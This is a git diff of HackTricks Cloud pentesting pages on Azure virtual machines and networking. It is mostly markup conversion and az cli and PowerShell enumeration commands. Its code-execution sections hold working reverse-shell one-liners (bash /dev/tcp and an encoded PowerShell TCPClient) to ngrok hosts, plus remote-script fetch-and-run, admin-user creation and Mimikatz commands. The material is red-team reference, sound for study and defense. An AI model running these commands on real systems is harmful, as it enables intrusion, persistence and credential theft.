+ - **Confidential VMs**: On top of a trusted launch, it offers hardware-based isolation between the VM, hypervisor and host management, improves the disk encryption and [**more**](https://learn.microsoft.com/en-us/azure/confidential-computing/confidential-vm-overview)**.** +- **Authentication**: By default a new **SSH key is generated**, although it's possible to use a public key or use a previous key and the username by default is **azureuser**. It's also possible to configure to use a **password.** +- **VM disk encryption:** The disk is encrypted at rest by default using a platform managed key. + - It's also possible to enable **Encryption at host**, where the data will be encrypted in the host before sending it to the storage service, ensuring an end-to-end encryption between the host and the storage service ([**docs**](https://learn.microsoft.com/en-gb/azure/virtual-machines/disk-encryption#encryption-at-host---end-to-end-encryption-for-your-vm-data)). +- **NIC network security group**: + - **None**: Basically opens every port + - **Basic**: Allows to easily open the inbound ports HTTP (80), HTTPS (443), SSH (22), RDP (3389) + - **Advanced**: Select a security group +- **Backup**: It's possible to enable **Standard** backup (one a day) and **Enhanced** (multiple per day) +- **Patch orchestration options**: This enable to automatically apply patches in the VMs according to the selected policy as described in the [**docs**](https://learn.microsoft.com/en-us/azure/virtual-machines/automatic-vm-guest-patching). +- **Alerts**: It's possible to automatically get alerts by email or mobile app when something happen in the VM. 
Default rules: + - Percentage CPU is greater than 80% + - Available Memory Bytes is less than 1GB + - Data Disks IOPS Consumed Percentage is greater than 95% + - OS IOPS Consumed Percentage is greater than 95% + - Network in Total is greater than 500GB + - Network Out Total is greater than 200GB + - VmAvailabilityMetric is less than 1 +- **Heath monitor**: By default check protocol HTTP in port 80 +- **Locks**: It allows to lock a VM so it can only be read (**ReadOnly** lock) or it can be read and updated but not deleted (**CanNotDelete** lock). + - Most VM related resources **also support locks** like disks, snapshots... + - Locks can also be applied at **resource group and subscription levels** ## Disks & snapshots -* It's possible to **enable to attach a disk to 2 or more VMs** -* By default every disk is **encrypted** with a platform key. - * Same in snapshots -* By default it's possible to **share the disk from all networks**, but it can also be **restricted** to only certain **private acces**s or to **completely disable** public and private access. - * Same in snapshots -* It's possible to **generate a SAS URI** (of max 60days) to **export the disk**, which can be configured to require authentication or not - * Same in snapshots +- It's possible to **enable to attach a disk to 2 or more VMs** +- By default every disk is **encrypted** with a platform key. + - Same in snapshots +- By default it's possible to **share the disk from all networks**, but it can also be **restricted** to only certain **private acces**s or to **completely disable** public and private access. + - Same in snapshots +- It's possible to **generate a SAS URI** (of max 60days) to **export the disk**, which can be configured to require authentication or not + - Same in snapshots + +{{#tabs}} +{{#tab name="az cli"}} -{% tabs %} -{% tab title="az cli" %} -{% code overflow="wrap" %} ```bash # List all disks az disk list --output table 
@@ -76,11 +63,10 @@ az disk list --output table # Get info about a disk az disk show --name --resource-group ``` -{% endcode %} -{% endtab %} -{% tab title="PowerShell" %} -{% code overflow="wrap" %} +{{#endtab}} +{{#tab name="PowerShell"}} + ```powershell # List all disks Get-AzDisk @@ -88,9 +74,9 @@ Get-AzDisk # Get info about a disk Get-AzDisk -Name -ResourceGroupName ``` -{% endcode %} -{% endtab %} -{% endtabs %} + +{{#endtab}} +{{#endtabs}} ## Images, Gallery Images & Restore points @@ -99,9 +85,9 @@ Images can be managed in the **Images section** of Azure or inside **Azure compu A **restore point** stores the VM configuration and **point-in-time** application-consistent **snapshots of all the managed disks** attached to the VM. It's related to the VM and its purpose is to be able to restore that VM to how it was in that specific point in it. -{% tabs %} -{% tab title="az cli" %} -{% code overflow="wrap" %} +{{#tabs}} +{{#tab name="az cli"}} + ```bash # Shared Image Galleries | Compute Galleries ## List all galleries and get info about one @@ -112,19 +98,19 @@ az sig show --gallery-name --resource-group az sig list-community --output table ## List galleries shaerd with me -az sig list-shared --location --output table +az sig list-shared --location --output table ## List all image definitions in a gallery and get info about one az sig image-definition list --gallery-name --resource-group --output table az sig image-definition show --gallery-image-definition --gallery-name --resource-group -## List all the versions of an image definition in a gallery +## List all the versions of an image definition in a gallery az sig image-version list --gallery-image-name --gallery-name --resource-group --resource-group --output table -# Images +# Images # List all managed images in your subscription az image list --output table 
@@ -133,11 +119,10 @@ az image list --output table az restore-point collection list-all --output table az restore-point collection show --collection-name --resource-group ``` -{% endcode %} -{% endtab %} -{% tab title="PowerShell" %} -{% code overflow="wrap" %} +{{#endtab}} +{{#tab name="PowerShell"}} + ```powershell ## List all galleries and get info about one Get-AzGallery @@ -147,13 +132,13 @@ Get-AzGallery -Name -ResourceGroupName Get-AzGalleryImageDefinition -GalleryName -ResourceGroupName Get-AzGalleryImageDefinition -GalleryName -ResourceGroupName -Name -## List all the versions of an image definition in a gallery +## List all the versions of an image definition in a gallery Get-AzGalleryImageVersion -GalleryImageDefinitionName -GalleryName -ResourceGroupName ## List all VM applications inside a gallery Get-AzGalleryApplication -GalleryName -ResourceGroupName -# Images +# Images # List all managed images in your subscription Get-AzImage -Name -ResourceGroupName @@ -161,9 +146,9 @@ Get-AzImage -Name -ResourceGroupName ## List all restore points and get info about 1 Get-AzRestorePointCollection -Name -ResourceGroupName ``` -{% endcode %} -{% endtab %} -{% endtabs %} + +{{#endtab}} +{{#endtabs}} ## Azure Site Recovery @@ -177,9 +162,9 @@ The Bastion deploys a subnet called **`AzureBastionSubnet`** with a `/26` netmas To list all Azure Bastion Hosts in your subscription and connect to VMs through them, you can use the following commands: -{% tabs %} -{% tab title="az cli" %} -{% code overflow="wrap" %} +{{#tabs}} +{{#tab name="az cli"}} + ```bash # List bastions az network bastion list -o table @@ -202,18 +187,17 @@ az network bastion rdp \ --username \ --password ``` -{% endcode %} -{% endtab %} -{% tab title="PowerShell" %} -{% code overflow="wrap" %} +{{#endtab}} +{{#tab name="PowerShell"}} + ```powershell # List bastions Get-AzBastion ``` -{% endcode %} -{% endtab %} -{% endtabs %} + +{{#endtab}} +{{#endtabs}} ## Metadata 
@@ -223,11 +207,12 @@ Moreover, to contact the metadata endpoint, the HTTP request must have the heade Check how to enumerate it in: -{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#azure-vm" %} +{{#ref}} +https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#azure-vm +{{#endref}} ## VM Enumeration -{% code overflow="wrap" %} ```bash # VMs ## List all VMs and get info about one @@ -275,19 +260,19 @@ az sig show --gallery-name --resource-group az sig list-community --output table ## List galleries shared with me -az sig list-shared --location --output table +az sig list-shared --location --output table ## List all image definitions in a gallery and get info about one az sig image-definition list --gallery-name --resource-group --output table az sig image-definition show --gallery-image-definition --gallery-name --resource-group -## List all the versions of an image definition in a gallery +## List all the versions of an image definition in a gallery az sig image-version list --gallery-image-name --gallery-name --resource-group --resource-group --output table -# Images +# Images # List all managed images in your subscription az image list --output table @@ -363,9 +348,6 @@ az resource list --resource-type "Microsoft.Compute/virtualMachines" --query "[] # List all available run commands for virtual machines az vm run-command list --output table ``` -{% endcode %} - - ```powershell # Get readable VMs @@ -385,6 +367,7 @@ Get-AzVMExtension -ResourceGroupName -VMName Get-AzVM | select -ExpandProperty NetworkProfile # Get name of network connector of VM Get-AzNetworkInterface -Name # Get info of network connector (like IP) + # Disks ## List all disks and get info about one Get-AzDisk 
@@ -403,13 +386,13 @@ Get-AzSnapshot -Name -ResourceGroupName Get-AzGalleryImageDefinition -GalleryName -ResourceGroupName Get-AzGalleryImageDefinition -GalleryName -ResourceGroupName -Name -## List all the versions of an image definition in a gallery +## List all the versions of an image definition in a gallery Get-AzGalleryImageVersion -GalleryImageDefinitionName -GalleryName -ResourceGroupName ## List all VM applications inside a gallery Get-AzGalleryApplication -GalleryName -ResourceGroupName -# Images +# Images # List all managed images in your subscription Get-AzImage -Name -ResourceGroupName @@ -423,7 +406,7 @@ Get-AzBastion # Network ## List all VNets in your subscription -Get-AzVirtualNetwork +Get-AzVirtualNetwork ## List VNet peering connections for a given VNet (Get-AzVirtualNetwork -ResourceGroupName -Name ).VirtualNetworkPeerings @@ -455,6 +438,7 @@ Get-AzStorageAccount ## List all custom script extensions on a specific VM Get-AzVMExtension -VMName -ResourceGroupName + ``` ## Code Execution in VMs @@ -469,9 +453,9 @@ The required permission is **`Microsoft.Compute/virtualMachines/extensions/write It's possible to list all the available extensions with: -{% tabs %} -{% tab title="Az Cli" %} -{% code overflow="wrap" %} +{{#tabs }} +{{#tab name="Az Cli" }} + ```bash # It takes some mins to run az vm extension image list --output table 
@@ -479,26 +463,25 @@ az vm extension image list --output table # Get extensions by publisher az vm extension image list --publisher "Site24x7" --output table ``` -{% endcode %} -{% endtab %} -{% tab title="PowerShell" %} -{% code overflow="wrap" %} +{{#endtab }} +{{#tab name="PowerShell" }} + ```powershell # It takes some mins to run Get-AzVMExtensionImage -Location -PublisherName -Type ``` -{% endcode %} -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} It's possible to **run custom extensions that runs custom code**: -{% tabs %} -{% tab title="Linux" %} -* Execute a revers shell +{{#tabs }} +{{#tab name="Linux" }} + +- Execute a revers shell -{% code overflow="wrap" %} ```bash # Prepare the rev shell echo -n 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/13215 0>&1' | base64 @@ -514,11 +497,9 @@ az vm extension set \ --settings '{}' \ --protected-settings '{"commandToExecute": "nohup echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ== | base64 -d | bash &"}' ``` -{% endcode %} -* Execute a script located on the internet +- Execute a script located on the internet -{% code overflow="wrap" %} ```bash az vm extension set \ --resource-group rsc-group> \ 
@@ -529,13 +510,13 @@ az vm extension set \
 --settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/8ce279967be0855cc13aa2601402fed3/raw/72816c3603243cf2839a7c4283e43ef4b6048263/hacktricks_touch.sh"]}' \
 --protected-settings '{"commandToExecute": "sh hacktricks_touch.sh"}'
 ```
-{% endcode %}
-{% endtab %}
-{% tab title="Windows" %}
-* Execute a reverse shell
+{{#endtab }}
+
+{{#tab name="Windows" }}
+
+- Execute a reverse shell
-{% code overflow="wrap" %}
 ```bash
 # Get encoded reverse shell
 echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
@@ -551,11 +532,9 @@ az vm extension set \ --protected-settings '{"commandToExecute": "powershell.exe -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="}' ``` -{% endcode %} -* Execute reverse shell from file +- Execute reverse shell from file -{% code overflow="wrap" %} ```bash az vm extension set \ --resource-group \ 
@@ -566,21 +545,19 @@ az vm extension set \
 --settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/33b6d1a80421694e85d96b2a63fd1924/raw/d0ef31f62aaafaabfa6235291e3e931e20b0fc6f/ps1_rev_shell.ps1"]}' \
 --protected-settings '{"commandToExecute": "powershell.exe -ExecutionPolicy Bypass -File ps1_rev_shell.ps1"}'
 ```
-{% endcode %}
 You could also execute other payloads like: `powershell net users new_user Welcome2022. /add /Y; net localgroup administrators new_user /add`
-* Reset password using the VMAccess extension
+- Reset password using the VMAccess extension
-{% code overflow="wrap" %}
 ```powershell
 # Run VMAccess extension to reset the password
 $cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password
 Set-AzVMAccessExtension -ResourceGroupName "" -VMName "" -Name "myVMAccess" -Credential $cred
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 ### Relevant VM extensions
@@ -592,13 +569,11 @@ The required permission is still **`Microsoft.Compute/virtualMachines/extensions
 This extension allows to modify the password (or create if it doesn't exist) of users inside Windows VMs.
-{% code overflow="wrap" %}
 ```powershell
 # Run VMAccess extension to reset the password
 $cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password
 Set-AzVMAccessExtension -ResourceGroupName "" -VMName "" -Name "myVMAccess" -Credential $cred
 ```
-{% endcode %}
@@ -668,7 +643,6 @@ This is a VM extension that would allow to execute runbooks in VMs from an autom
 These are packages with all the **application data and install and uninstall scripts** that can be used to easily add and remove application in VMs.
-{% code overflow="wrap" %}
 ```bash
 # List all galleries in resource group
 az sig list --resource-group --output table
@@ -676,33 +650,32 @@ az sig list --resource-group --output table
 # List all apps in a fallery
 az sig gallery-application list --gallery-name --resource-group --output table
 ```
-{% endcode %}
 These are the paths were the applications get downloaded inside the file system:
-* Linux: `/var/lib/waagent/Microsoft.CPlat.Core.VMApplicationManagerLinux//`
-* Windows: `C:\Packages\Plugins\Microsoft.CPlat.Core.VMApplicationManagerWindows\1.0.9\Downloads\\`
+- Linux: `/var/lib/waagent/Microsoft.CPlat.Core.VMApplicationManagerLinux//`
+- Windows: `C:\Packages\Plugins\Microsoft.CPlat.Core.VMApplicationManagerWindows\1.0.9\Downloads\\`
 Check how to install new applications in [https://learn.microsoft.com/en-us/azure/virtual-machines/vm-applications-how-to?tabs=cli](https://learn.microsoft.com/en-us/azure/virtual-machines/vm-applications-how-to?tabs=cli)
-{% hint style="danger" %}
-It's possible to **share individual apps and galleries with other subscriptions or tenants**. Which is very interesting because it could allow an attacker to backdoor an application and pivot to other subscriptions and tenants.
-{% endhint %}
+> [!CAUTION]
+> It's possible to **share individual apps and galleries with other subscriptions or tenants**. Which is very interesting because it could allow an attacker to backdoor an application and pivot to other subscriptions and tenants.
 But there **isn't a "marketplace" for vm apps** like there is for extensions.
The permissions required are:
-* `Microsoft.Compute/galleries/applications/write`
-* `Microsoft.Compute/galleries/applications/versions/write`
-* `Microsoft.Compute/virtualMachines/write`
-* `Microsoft.Network/networkInterfaces/join/action`
-* `Microsoft.Compute/disks/write`
+- `Microsoft.Compute/galleries/applications/write`
+- `Microsoft.Compute/galleries/applications/versions/write`
+- `Microsoft.Compute/virtualMachines/write`
+- `Microsoft.Network/networkInterfaces/join/action`
+- `Microsoft.Compute/disks/write`
 Exploitation example to execute arbitrary commands:
-{% tabs %}
-{% tab title="Linux" %}
+{{#tabs }}
+{{#tab name="Linux" }}
+
 ```bash
 # Create gallery (if the isn't any)
 az sig create --resource-group myResourceGroup \
@@ -737,10 +710,11 @@ az vm application set \
 --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \
 --treat-deployment-as-failure true
 ```
-{% endtab %}
-{% tab title="Windows" %}
-{% code overflow="wrap" %}
+{{#endtab }}
+
+{{#tab name="Windows" }}
+
 ```bash
 # Create gallery (if the isn't any)
 az sig create --resource-group \
@@ -779,9 +753,9 @@ az vm application set \
 --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellAppWin/versions/1.0.0 \
 --treat-deployment-as-failure true
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 ### User data
@@ -791,12 +765,12 @@ This is **persistent data** that can be retrieved from the metadata endpoint at
 It's possible to pass some data to the VM that will be stored in expected paths:
-* In **Windows** custom data is placed in `%SYSTEMDRIVE%\AzureData\CustomData.bin` as a binary file and it isn't processed.
-* In **Linux** it was stored in `/var/lib/waagent/ovf-env.xml` and now it's stored in `/var/lib/waagent/CustomData/ovf-env.xml`
- * **Linux agent**: It doesn't process custom data by default, a custom image with the data enabled is needed
- * **cloud-init:** By default it processes custom data and this data may be in [**several formats**](https://cloudinit.readthedocs.io/en/latest/explanation/format.html). It could execute a script easily sending just the script in the custom data.
- * I tried that both Ubuntu and Debian execute the script you put here.
- * It's also not needed to enable user data for this to be executed.
+- In **Windows** custom data is placed in `%SYSTEMDRIVE%\AzureData\CustomData.bin` as a binary file and it isn't processed.
+- In **Linux** it was stored in `/var/lib/waagent/ovf-env.xml` and now it's stored in `/var/lib/waagent/CustomData/ovf-env.xml`
+ - **Linux agent**: It doesn't process custom data by default, a custom image with the data enabled is needed
+ - **cloud-init:** By default it processes custom data and this data may be in [**several formats**](https://cloudinit.readthedocs.io/en/latest/explanation/format.html). It could execute a script easily sending just the script in the custom data.
+ - I tried that both Ubuntu and Debian execute the script you put here.
+ - It's also not needed to enable user data for this to be executed.
 ```bash
 #!/bin/sh
@@ -807,8 +781,9 @@ echo "Hello World" > /var/tmp/output.txt
 This is the most basic mechanism Azure provides to **execute arbitrary commands in VMs**. The needed permission is `Microsoft.Compute/virtualMachines/runCommand/action`.
-{% tabs %}
-{% tab title="Linux" %}
+{{#tabs }}
+{{#tab name="Linux" }}
+
 ```bash
 # Execute rev shell
 az vm run-command invoke \
@@ -820,10 +795,11 @@ az vm run-command invoke \
 # revshell.sh file content
 echo "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" > revshell.sh
 ```
-{% endtab %}
-{% tab title="Windows" %}
-{% code overflow="wrap" %}
+{{#endtab }}
+
+{{#tab name="Windows" }}
+
 ```bash
 # The permission allowing this is Microsoft.Compute/virtualMachines/runCommand/action
 # Execute a rev shell
@@ -840,7 +816,7 @@ echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",1
 ## In Package file link just add any link to a blobl storage file
 export encodedCommand="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"
-# The content of
+# The content of
 echo "powershell.exe -EncodedCommand $encodedCommand" > revshell.ps1
@@ -848,51 +824,38 @@ echo "powershell.exe -EncodedCommand $encodedCommand" > revshell.ps1
 Import-module MicroBurst.psm1
 Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 ## Privilege Escalation
-{% content-ref url="../../az-privilege-escalation/az-virtual-machines-and-network-privesc.md" %}
-[az-virtual-machines-and-network-privesc.md](../../az-privilege-escalation/az-virtual-machines-and-network-privesc.md)
-{% endcontent-ref %}
+{{#ref}}
+../../az-privilege-escalation/az-virtual-machines-and-network-privesc.md
+{{#endref}}
 ## Unauthenticated Access
-{% content-ref url="../../az-unauthenticated-enum-and-initial-entry/az-vms-unath.md" %}
-[az-vms-unath.md](../../az-unauthenticated-enum-and-initial-entry/az-vms-unath.md)
-{% endcontent-ref %}
+{{#ref}}
+../../az-unauthenticated-enum-and-initial-entry/az-vms-unath.md
+{{#endref}}
 ## Post Exploitation
-{% content-ref url="../../az-post-exploitation/az-vms-and-network-post-exploitation.md" %}
-[az-vms-and-network-post-exploitation.md](../../az-post-exploitation/az-vms-and-network-post-exploitation.md)
-{% endcontent-ref %}
+{{#ref}}
+../../az-post-exploitation/az-vms-and-network-post-exploitation.md
+{{#endref}}
 ## Persistence
-{% content-ref url="../../az-persistence/az-vms-persistence.md" %}
-[az-vms-persistence.md](../../az-persistence/az-vms-persistence.md)
-{% endcontent-ref %}
+{{#ref}}
+../../az-persistence/az-vms-persistence.md
+{{#endref}}
 ## References
-* [https://learn.microsoft.com/en-us/azure/virtual-machines/overview](https://learn.microsoft.com/en-us/azure/virtual-machines/overview)
-* [https://hausec.com/2022/05/04/azure-virtual-machine-execution-techniques/](https://hausec.com/2022/05/04/azure-virtual-machine-execution-techniques/)
-* [https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service](https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service)
+- [https://learn.microsoft.com/en-us/azure/virtual-machines/overview](https://learn.microsoft.com/en-us/azure/virtual-machines/overview)
+- [https://hausec.com/2022/05/04/azure-virtual-machine-execution-techniques/](https://hausec.com/2022/05/04/azure-virtual-machine-execution-techniques/)
+- [https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service](https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service)
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md b/src/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md
similarity index 77%
rename from pentesting-cloud/azure-security/az-services/vms/az-azure-network.md
rename to src/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md
index 83208cca7..e0b769a4a 100644
--- a/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md
+++ b/src/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md
@@ -1,19 +1,6 @@
 # Az - Azure Network
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
+{{#include ../../../../banners/hacktricks-training.md}}
 ## Basic Information
@@ -29,17 +16,17 @@ By default all subnets within the same Azure Virtual Network (VNet) **can commun
 **Example:**
-* `MyVNet` with an IP address range of 10.0.0.0/16.
- * **Subnet-1:** 10.0.0.0/24 for web servers.
- * **Subnet-2:** 10.0.1.0/24 for database servers.
+- `MyVNet` with an IP address range of 10.0.0.0/16.
+ - **Subnet-1:** 10.0.0.0/24 for web servers.
+ - **Subnet-2:** 10.0.1.0/24 for database servers.
 ### Enumeration
 To list all the VNets and subnets in an Azure account, you can use the Azure Command-Line Interface (CLI). Here are the steps:
-{% tabs %}
-{% tab title="az cli" %}
-{% code overflow="wrap" %}
+{{#tabs }}
+{{#tab name="az cli" }}
+
 ```bash
 # List VNets
 az network vnet list --query "[].{name:name, location:location, addressSpace:addressSpace}"
@@ -47,22 +34,22 @@ az network vnet list --query "[].{name:name, location:location, addressSpace:add
 # List subnets of a VNet
 az network vnet subnet list --resource-group --vnet-name --query "[].{name:name, addressPrefix:addressPrefix}" -o table
 ```
-{% endcode %}
-{% endtab %}
-{% tab title="PowerShell" %}
-{% code overflow="wrap" %}
+
+{{#endtab }}
+{{#tab name="PowerShell" }}
+
 ```powershell
 # List VNets
 Get-AzVirtualNetwork | Select-Object Name, Location, @{Name="AddressSpace"; Expression={$_.AddressSpace.AddressPrefixes}}
 # List subnets of a VNet
-Get-AzVirtualNetwork -ResourceGroupName -Name |
-Select-Object -ExpandProperty Subnets |
+Get-AzVirtualNetwork -ResourceGroupName -Name |
+Select-Object -ExpandProperty Subnets |
 Select-Object Name, AddressPrefix
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 ## Network Security Groups (NSG)
@@ -72,14 +59,14 @@ NSGs can be associated to **subnets and NICs.**
 **Rules example:**
-* An inbound rule allowing HTTP traffic (port 80) from any source to your web servers.
-* An outbound rule allowing only SQL traffic (port 1433) to a specific destination IP address range.
+- An inbound rule allowing HTTP traffic (port 80) from any source to your web servers.
+- An outbound rule allowing only SQL traffic (port 1433) to a specific destination IP address range.
 ### Enumeration
-{% tabs %}
-{% tab title="az cli" %}
-{% code overflow="wrap" %}
+{{#tabs }}
+{{#tab name="az cli" }}
+
 ```bash
 # List NSGs
 az network nsg list --query "[].{name:name, location:location}" -o table
@@ -91,24 +78,25 @@ az network nsg rule list --nsg-name --resource-group -ResourceGroupName
 # Get NSG rules
-(Get-AzNetworkSecurityGroup -ResourceGroupName -Name ).SecurityRules
+(Get-AzNetworkSecurityGroup -ResourceGroupName -Name ).SecurityRules
 # Get NICs and subnets using this NSG
 (Get-AzNetworkSecurityGroup -Name -ResourceGroupName ).Subnets
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
+
 ## Azure Firewall
 Azure Firewall is a **managed network security service** in Azure that protects cloud resources by inspecting and controlling traffic. It is a **stateful firewall** that filters traffic based on rules for Layers 3 to 7, supporting communication both **within Azure** (east-west traffic) and **to/from external networks** (north-south traffic). Deployed at the **Virtual Network (VNet) level**, it provides centralized protection for all subnets in the VNet. Azure Firewall automatically scales to handle traffic demands and ensures high availability without requiring manual setup.
@@ -127,9 +115,9 @@ It is available in three SKUs—**Basic**, **Standard**, and **Premium**, each t
 ### Enumeration
-{% tabs %}
-{% tab title="az cli" %}
-{% code overflow="wrap" %}
+{{#tabs }}
+{{#tab name="az cli" }}
+
 ```bash
 # List Azure Firewalls
 az network firewall list --query "[].{name:name, location:location, subnet:subnet, publicIp:publicIp}" -o table
@@ -143,10 +131,10 @@ az network firewall application-rule collection list --firewall-name --resource-group --query "[].{name:name, rules:rules}" -o table
 ```
-{% endcode %}
-{% endtab %}
-{% tab title="PowerShell" %}
-{% code overflow="wrap" %}
+
+{{#endtab }}
+{{#tab name="PowerShell" }}
+
 ```powershell
 # List Azure Firewalls
 Get-AzFirewall
@@ -160,21 +148,21 @@ Get-AzFirewall
 # Get nat rules of a firewall
 (Get-AzFirewall -Name -ResourceGroupName ).NatRuleCollections
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 ## Azure Route Tables
-Azure **Route Tables** are used to control the routing of network traffic within a subnet. They define rules that specify how packets should be forwarded, either to Azure resources, the internet, or a specific next hop like a Virtual Appliance or Azure Firewall. You can associate a route table with a **subnet**, and all resources within that subnet will follow the routes in the table.
+Azure **Route Tables** are used to control the routing of network traffic within a subnet. They define rules that specify how packets should be forwarded, either to Azure resources, the internet, or a specific next hop like a Virtual Appliance or Azure Firewall. You can associate a route table with a **subnet**, and all resources within that subnet will follow the routes in the table.
 **Example:** If a subnet hosts resources that need to route outbound traffic through a Network Virtual Appliance (NVA) for inspection, you can create a **route** in a route table to redirect all traffic (e.g., `0.0.0.0/0`) to the NVA's private IP address as the next hop.
 ### **Enumeration**
-{% tabs %}
-{% tab title="az cli" %}
